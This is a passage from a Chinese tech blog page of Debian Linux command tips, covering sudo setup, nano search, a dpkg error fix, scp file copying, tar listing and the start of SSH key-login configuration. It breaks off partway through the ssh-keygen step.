<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <title>Debian Linux命令其环境配置 | 评布客博客</title>
    <meta name="description" content="人生处万类，知识最为贤。 —— 韩愈">
    <meta name="generator" content="VuePress 1.3.1">
    <link rel="alternate" type="application/rss+xml" href="/rss.xml" title="评布客博客">
  <link rel="stylesheet" href="/fonts/fonts.css">
  <link rel="icon" href="/favicon.ico">
  <link rel="shortcut icon" href="/img/favicon.ico">
  <link rel="apple-touch-icon" href="/img/logo.png">
  <meta name="keywords" content="评布客,评布客博客,java,python,vue,技术培训,前端培训,后端培训,ionic,springboot,vue,小程序,安卓app,苹果App,技术博客,分享,vuejs,python,灵鸽,爬虫,python爬虫">
  <meta name="description" content="评布客博客，点滴记录贵在坚持">
  <meta name="google-site-verification" content="pyUtZja0WJ34YSL_6K0FkcYBU7pDR56XMU92nvDtz7k">
  <script async="true" src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  <script async="true" src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
  <script>(adsbygoogle = window.adsbygoogle || []).push({  google_ad_client: 'ca-pub-1893384651266286',  enable_page_level_ads: true });</script>
    <meta property="article:modified_time" content="Wed Aug 19 2020 08:31:09 GMT+0800 (GMT+08:00)"><meta property="og:site_name" content="评布客博客"><meta property="og:title" content="Debian Linux命令其环境配置"><meta property="og:type" content="article"><meta property="og:url" content="/blog/setup/linux-setup.html"><meta name="twitter:title" content="Debian Linux命令其环境配置"><meta name="twitter:url" content="/blog/setup/linux-setup.html"><meta name="twitter:card" content="summary_large_image">
    <link rel="preload" href="/assets/css/0.styles.998fa698.css" as="style"><link rel="preload" href="/assets/js/app.8a5f3a7e.js" as="script"><link rel="preload" href="/assets/js/3.5bbf39f9.js" as="script"><link rel="preload" href="/assets/js/85.82619656.js" as="script">
    <link rel="stylesheet" href="/assets/css/0.styles.998fa698.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="sidebar-button"><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img" viewBox="0 0 448 512" class="icon"><path fill="currentColor" d="M436 124H12c-6.627 0-12-5.373-12-12V80c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12z"></path></svg></div> <a href="/" class="home-link router-link-active"><!----> <span class="site-name">评布客博客</span></a> <div class="links"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><div class="nav-item"><a href="/blog/" class="nav-link router-link-active">博客</a></div><div class="nav-item"><a href="/contact-me/" class="nav-link">留言板</a></div><div class="nav-item"><a href="/CHANGELOG.html" class="nav-link">历史更新</a></div><div class="nav-item"><a href="https://pingbook.top" target="_blank" rel="noopener noreferrer" class="nav-link external">
  JVFast管理框架
  <svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg></a></div><div class="nav-item"><a href="https://code.pingbook.top/ant-design-vue" target="_blank" rel="noopener noreferrer" class="nav-link external">
  ant-design-vue
  <svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg></a></div><div class="nav-item"><a href="https://code.pingbook.top/ionic-vue" target="_blank" rel="noopener noreferrer" class="nav-link external">
  ionic-vue
  <svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg></a></div> <!----></nav></div></header> <div class="sidebar-mask"></div> <aside class="sidebar"><nav class="nav-links"><div class="nav-item"><a href="/blog/" class="nav-link router-link-active">博客</a></div><div class="nav-item"><a href="/contact-me/" class="nav-link">留言板</a></div><div class="nav-item"><a href="/CHANGELOG.html" class="nav-link">历史更新</a></div><div class="nav-item"><a href="https://pingbook.top" target="_blank" rel="noopener noreferrer" class="nav-link external">
  JVFast管理框架
  <svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg></a></div><div class="nav-item"><a href="https://code.pingbook.top/ant-design-vue" target="_blank" rel="noopener noreferrer" class="nav-link external">
  ant-design-vue
  <svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg></a></div><div class="nav-item"><a href="https://code.pingbook.top/ionic-vue" target="_blank" rel="noopener noreferrer" class="nav-link external">
  ionic-vue
  <svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg></a></div> <!----></nav>  <ul class="sidebar-links"><li><section class="sidebar-group depth-0"><p class="sidebar-heading"><span>前序</span> <!----></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/blog/" class="sidebar-link">关于博客</a></li><li><a href="/blog/synax.html" class="sidebar-link">语法参考手册</a></li></ul></section></li><li><section class="sidebar-group depth-0"><p class="sidebar-heading"><span>技术版本更新</span> <!----></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/blog/release/scrapy.html" class="sidebar-link">scrapy2版本新特性</a></li><li><a href="/blog/release/jdk.html" class="sidebar-link">JDK版本新特性</a></li></ul></section></li><li><section class="sidebar-group depth-0"><p class="sidebar-heading open"><span>环境配置和部署</span> <!----></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/blog/setup/video-edit-setup.html" class="sidebar-link">流行视频剪辑工具对比评测及其选型</a></li><li><a href="/blog/setup/genymotion-setup.html" class="sidebar-link">最新genymotion3资源下载及其配置</a></li><li><a href="/blog/setup/bitcoin-mining-setup.html" class="sidebar-link">比特币及其挖矿配置</a></li><li><a href="/blog/setup/how-picgo-vscode-setup.html" class="sidebar-link">如何在VSCode中配置PicGo图床</a></li><li><a href="/blog/setup/node-nuxt-setup.html" class="sidebar-link">Vue nuxtjs安装及其环境配置</a></li><li><a href="/blog/setup/nuxt-setup.html" class="sidebar-link">Vue nuxtjs插件类库配置集成</a></li><li><a href="/blog/setup/ux-tool-best-setup.html" class="sidebar-link">流行通用UX/UI工具对比整理2020</a></li><li><a href="/blog/setup/fanqiang-setup.html" class="sidebar-link">翻墙工具环境配置</a></li><li><a href="/blog/setup/frp-linux-setup.html" class="sidebar-link">FRP内网穿透环境配置</a></li><li><a href="/blog/setup/artipub-setup.html" class="sidebar-link">artipub多平台博客发布工具使用配置</a></li><li><a href="/blog/setup/wordpress-setup.html" class="sidebar-link">Wordpress Linux命令其环境配置</a></li><li><a href="/blog/setup/raspberry-setup.html" class="sidebar-link">树莓派Linux安装及其环境配置</a></li><li><a href="/blog/setup/linux-setup.html" class="active sidebar-link">Debian Linux命令其环境配置</a><ul class="sidebar-sub-headers"><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#bash-sudo-command-not-found" class="sidebar-link">-bash: sudo: command not found</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#nano命令查找字符串search" class="sidebar-link">nano命令查找字符串search</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#sudo-apt-get-error-flabspath-on-var-lib-dpkg-status-failed-no-such-file-or-directory" class="sidebar-link">Sudo apt-get error: flAbsPath on /var/lib/dpkg/status failed - No such file or directory</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#复制本地文件到服务器" class="sidebar-link">复制本地文件到服务器</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#列出tar-gz压缩包的文件" class="sidebar-link">列出tar.gz压缩包的文件</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#linux密钥登录和用户名密码登录" class="sidebar-link">Linux密钥登录和用户名密码登录</a><ul class="sidebar-sub-headers"><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#_1-产生公钥和私钥文件" class="sidebar-link">1. 产生公钥和私钥文件</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#_2-在服务器上安装公钥" class="sidebar-link">2. 在服务器上安装公钥</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#_3-设置ssh，打开公钥登录功能" class="sidebar-link">3. 设置SSH，打开公钥登录功能</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#_4-xshell等客户端将私钥下载到客户端，然后使用" class="sidebar-link">4. XShell等客户端将私钥下载到客户端，然后使用</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#_5-关闭原密码登陆方式-小心注意" class="sidebar-link">5. 关闭原密码登陆方式(小心注意)</a></li></ul></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#linux中cache内存占用过高解决办法" class="sidebar-link">Linux中Cache内存占用过高解决办法</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#查看当前运行的进程的详细路径" class="sidebar-link">查看当前运行的进程的详细路径</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#通过进程pid查看进程" class="sidebar-link">通过进程pid查看进程</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#查看进程占用排序" class="sidebar-link">查看进程占用排序</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#查看定时任务-crontab命令" class="sidebar-link">查看定时任务 crontab命令</a><ul class="sidebar-sub-headers"><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#etc-crontab文件和crontab-e命令区别" class="sidebar-link">/etc/crontab文件和crontab -e命令区别</a></li></ul></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#设置时区" class="sidebar-link">设置时区</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#查看文件夹各个文件大小" class="sidebar-link">查看文件夹各个文件大小</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#查看linux的架构-32-bit-or-64-bit" class="sidebar-link">查看linux的架构 32-bit or 64-bit</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#查看本机打开的端口号" class="sidebar-link">查看本机打开的端口号</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#创建链接" class="sidebar-link">创建链接</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#删除缓存的安装失败的包" class="sidebar-link">删除缓存的安装失败的包</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#修改用户名" class="sidebar-link">修改用户名</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#ssh登录失败" class="sidebar-link">ssh登录失败</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#改变当前用户组" class="sidebar-link">改变当前用户组</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#unzip命令中文文件名乱码" class="sidebar-link">unzip命令中文文件名乱码</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#配置linux并发最大打开文件数" class="sidebar-link">配置linux并发最大打开文件数</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#定时备份mysql数据库，保存7天记录脚本" class="sidebar-link">定时备份mysql数据库，保存7天记录脚本</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#ssh-或者telent登录linux后screen后台运行脚本" class="sidebar-link">SSH 或者telent登录linux后screen后台运行脚本</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#shell脚本中-dev-null-2-1" class="sidebar-link">shell脚本中&gt;/dev/null 2&gt;&amp;1</a><ul class="sidebar-sub-headers"><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#nohup结合" class="sidebar-link">nohup结合</a></li></ul></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#挖矿木马病毒清理" class="sidebar-link">挖矿木马病毒清理</a><ul class="sidebar-sub-headers"><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#木马解析" class="sidebar-link">木马解析</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#木马分析" class="sidebar-link">木马分析</a></li><li class="sidebar-sub-header"><a href="/blog/setup/linux-setup.html#常见非法的木马病毒" class="sidebar-link">常见非法的木马病毒</a></li></ul></li></ul></li><li><a href="/blog/setup/nginx-setup.html" class="sidebar-link">Nginx Linux安装及其环境配置</a></li><li><a href="/blog/setup/python-setup.html" class="sidebar-link">Python Linux安装及其环境配置</a></li><li><a href="/blog/setup/python-scrapy-setup.html" class="sidebar-link">Scrapy爬虫配置</a></li><li><a href="/blog/setup/mysql-setup.html" class="sidebar-link">Debian MYSQL8安装及其环境配置</a></li><li><a href="/blog/setup/uwsgi-setup.html" class="sidebar-link">Python Uwsgi Linux安装及其环境配置</a></li><li><a href="/blog/setup/tomcat-setup.html" class="sidebar-link">Tomcat Linux安装及其环境配置</a></li><li><a href="/blog/setup/redis-setup.html" class="sidebar-link">Redis Linux安装及其环境配置</a></li><li><a href="/blog/setup/sqlalchemy-setup.html" class="sidebar-link">Python SQLAlchemy Linux安装及其环境配置</a></li><li><a href="/blog/setup/mail-setup.html" class="sidebar-link">各种主流邮件服务商配置</a></li><li><a href="/blog/setup/win10-environment-setup.html" class="sidebar-link">Windows10机器新环境配置</a></li><li><a href="/blog/setup/mac-setup.html" class="sidebar-link">Mac机器或者虚拟机相关配置配置</a></li></ul></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>2020年归档</span> <span class="arrow right"></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>2019年归档</span> <span class="arrow right"></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>开发工具</span> <span class="arrow right"></span></p> <!----></section></li><li><section class="sidebar-group depth-0"><p class="sidebar-heading"><span>友情链接</span> <!----></p> <ul class="sidebar-links sidebar-group-items"><li><a href="https://www.yasminzy.com/nuxt/" target="_blank" rel="noopener noreferrer" class="sidebar-link">【前端】nuxt常用插件集成<svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg></a></li><li><a href="https://mybatis.plus/" target="_blank" rel="noopener noreferrer" class="sidebar-link">【后端】Mybatis Plus<svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg></a></li><li><a href="http://www.ruanyifeng.com/blog/" target="_blank" rel="noopener noreferrer" class="sidebar-link">【前端】阮一峰博客<svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg></a></li><li><a href="https://www.jianshu.com/u/4ca93d60a9fe" target="_blank" rel="noopener noreferrer" class="sidebar-link">【前端】IT晴天<svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg></a></li><li><a href="https://github.com/vuejs/awesome-vue" target="_blank" rel="noopener noreferrer" class="sidebar-link">【前端】awesome vue<svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg></a></li><li><a href="https://ionicframework.com/docs/components" target="_blank" rel="noopener noreferrer" class="sidebar-link">【前端】Ionic Vue Components<svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg></a></li><li><a href="https://github.com/vueComponent/ant-design-vue-awesome" target="_blank" rel="noopener noreferrer" class="sidebar-link">【前端】awesome ant-design-vue<svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg></a></li><li><a href="https://github.com/ulivz/awesome-vuepress" target="_blank" rel="noopener noreferrer" class="sidebar-link">【前端】awesome-vuepress<svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg></a></li><li><a href="https://tool.lu/" target="_blank" rel="noopener noreferrer" class="sidebar-link">【其它】程序员的工具集<svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg></a></li></ul></section></li></ul> </aside> <main class="page"> <div class="theme-default-content content__default"><!----> <p></p><div class="table-of-contents"><ul><li><a href="#bash-sudo-command-not-found">-bash: sudo: command not found</a></li><li><a href="#nano命令查找字符串search">nano命令查找字符串search</a></li><li><a href="#sudo-apt-get-error-flabspath-on-var-lib-dpkg-status-failed-no-such-file-or-directory">Sudo apt-get error: flAbsPath on /var/lib/dpkg/status failed - No such file or directory</a></li><li><a href="#复制本地文件到服务器">复制本地文件到服务器</a></li><li><a href="#列出tar-gz压缩包的文件">列出tar.gz压缩包的文件</a></li><li><a href="#linux密钥登录和用户名密码登录">Linux密钥登录和用户名密码登录</a><ul><li><a href="#_1-产生公钥和私钥文件">1. 产生公钥和私钥文件</a></li><li><a href="#_2-在服务器上安装公钥">2. 在服务器上安装公钥</a></li><li><a href="#_3-设置ssh，打开公钥登录功能">3. 设置SSH，打开公钥登录功能</a></li><li><a href="#_4-xshell等客户端将私钥下载到客户端，然后使用">4. XShell等客户端将私钥下载到客户端，然后使用</a></li><li><a href="#_5-关闭原密码登陆方式-小心注意">5. 关闭原密码登陆方式(小心注意)</a></li></ul></li><li><a href="#linux中cache内存占用过高解决办法">Linux中Cache内存占用过高解决办法</a></li><li><a href="#查看当前运行的进程的详细路径">查看当前运行的进程的详细路径</a></li><li><a href="#通过进程pid查看进程">通过进程pid查看进程</a></li><li><a href="#查看进程占用排序">查看进程占用排序</a></li><li><a href="#查看定时任务-crontab命令">查看定时任务 crontab命令</a><ul><li><a href="#etc-crontab-文件和-crontab-e-命令区别">/etc/crontab文件和crontab -e命令区别</a></li></ul></li><li><a href="#设置时区">设置时区</a></li><li><a href="#查看文件夹各个文件大小">查看文件夹各个文件大小</a></li><li><a href="#查看linux的架构-32-bit-or-64-bit">查看linux的架构 32-bit or 64-bit</a></li><li><a href="#查看本机打开的端口号">查看本机打开的端口号</a></li><li><a href="#创建链接">创建链接</a></li><li><a href="#删除缓存的安装失败的包">删除缓存的安装失败的包</a></li><li><a href="#修改用户名">修改用户名</a></li><li><a href="#ssh登录失败">ssh登录失败</a></li><li><a href="#改变当前用户组">改变当前用户组</a></li><li><a href="#unzip命令中文文件名乱码">unzip命令中文文件名乱码</a></li><li><a href="#配置linux并发最大打开文件数">配置linux并发最大打开文件数</a></li><li><a href="#定时备份mysql数据库，保存7天记录脚本">定时备份mysql数据库，保存7天记录脚本</a></li><li><a href="#ssh-或者telent登录linux后screen后台运行脚本">SSH 或者telent登录linux后screen后台运行脚本</a></li><li><a href="#shell脚本中-dev-null-2-1">shell脚本中&gt;/dev/null 2&gt;&amp;1</a><ul><li><a href="#nohup结合">nohup结合</a></li></ul></li><li><a href="#挖矿木马病毒清理">挖矿木马病毒清理</a><ul><li><a href="#木马解析">木马解析</a></li><li><a href="#木马分析">木马分析</a></li><li><a href="#常见非法的木马病毒">常见非法的木马病毒</a></li></ul></li></ul></div><p></p> <h2 id="bash-sudo-command-not-found"><a href="#bash-sudo-command-not-found" class="header-anchor">#</a> -bash: sudo: command not found</h2> <p>在debian系统中可能会报这个错误，执行如下安装<code>sudo</code>:</p> <div class="language-shell extra-class"><pre class="language-shell"><code>$ <span class="token function">apt</span> <span class="token function">install</span> <span class="token function">sudo</span> 
$ <span class="token function">nano</span> /etc/sudoers
<span class="token comment"># 检查对应的sudo组是否有所有的权限：</span>
<span class="token comment"># Allow members of group sudo to execute any command</span>
%sudo   <span class="token assign-left variable">ALL</span><span class="token operator">=</span><span class="token punctuation">(</span>ALL:ALL<span class="token punctuation">)</span> ALL

<span class="token comment"># 以上的设置说明sudo已经有所有的权限，这样设置即可。</span>
</code></pre></div><h2 id="nano命令查找字符串search"><a href="#nano命令查找字符串search" class="header-anchor">#</a> nano命令查找字符串search</h2> <p>当你想搜索某特定文字时，只要想成&quot;WhereIs&quot;而不是&quot;Search&quot;，事情就简单了。只要按下<strong>Ctrl+W</strong>，键入你要搜索的字符串，再按Enter就可以了。想再次搜索相同的字符串，可以直接按Alt+W。也就是搜索下一个。</p> <p>注意:在nano帮助文档里，Ctrl-键被表示为一个脱字符（^），因此<strong>Ctrl+W</strong>被写成了^W，等等。Alt-键被表示为一个M（从&quot;Meta&quot;而来），因此Alt+W被写成了M-W。</p> <h2 id="sudo-apt-get-error-flabspath-on-var-lib-dpkg-status-failed-no-such-file-or-directory"><a href="#sudo-apt-get-error-flabspath-on-var-lib-dpkg-status-failed-no-such-file-or-directory" class="header-anchor">#</a> Sudo apt-get error: flAbsPath on /var/lib/dpkg/status failed - No such file or directory</h2> <p>执行安装包安装报错： Sudo apt-get error: flAbsPath on /var/lib/dpkg/status failed - No such file or directory</p> <div class="language- extra-class"><pre class="language-text"><code>$ sudo touch /var/lib/dpkg/status
$ sudo apt update &amp;&amp; sudo apt upgrade
</code></pre></div><h2 id="复制本地文件到服务器"><a href="#复制本地文件到服务器" class="header-anchor">#</a> 复制本地文件到服务器</h2> <p><strong>scp - secure copy (remote file copy program)</strong></p> <ol><li>本地Windows下执行文件复制到指定目录
the <strong>.</strong> just indicates the current directory path.</li></ol> <div class="language- extra-class"><pre class="language-text"><code>D:\linux&gt; scp [source file] [username]@[destination server]:.
D:\linux&gt; scp cool_stuff.txt pi@192.168.1.17:.
D:\linux&gt; scp cool_stuff.txt pi@192.168.1.17:/this/path/right/here

</code></pre></div><ol start="2"><li>下载远程服务端文件到本地</li></ol> <div class="language- extra-class"><pre class="language-text"><code>$ scp sanjeev@example.com:cool_stuff.txt /this/path/right/here
</code></pre></div><h2 id="列出tar-gz压缩包的文件"><a href="#列出tar-gz压缩包的文件" class="header-anchor">#</a> 列出tar.gz压缩包的文件</h2> <p>命令: <code>tar tzf test.tar.gz</code></p> <h2 id="linux密钥登录和用户名密码登录"><a href="#linux密钥登录和用户名密码登录" class="header-anchor">#</a> Linux密钥登录和用户名密码登录</h2> <p>对于Linux服务器，默认以密码登陆，安全性比较差，很早前就有计划修改为使用密钥登陆，一直觉得比较麻烦搁置着，其实步骤并不难，只是当时没觉得安全问题有那么严重而已。如果你也是这么认为，那么可以尝试登陆Linux服务器，输入以下命令：</p> <div class="language- extra-class"><pre class="language-text"><code>lastb | less
</code></pre></div><p>可以看到几乎每天都会有大量的尝试登陆存在。为了服务器安全，禁止密码登陆，使用密钥方式登陆还是必要的。这里我尽量简单的记录下我设置的过程。</p> <p>配置方法</p> <h3 id="_1-产生公钥和私钥文件"><a href="#_1-产生公钥和私钥文件" class="header-anchor">#</a> 1. 产生公钥和私钥文件</h3> <ol><li>在服务器端使用如下命令产生公钥和私钥：</li></ol> <div class="language- extra-class"><pre class="language-text"><code>$  ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): &lt;== 按 Enter
Created directory '/root/.ssh'.
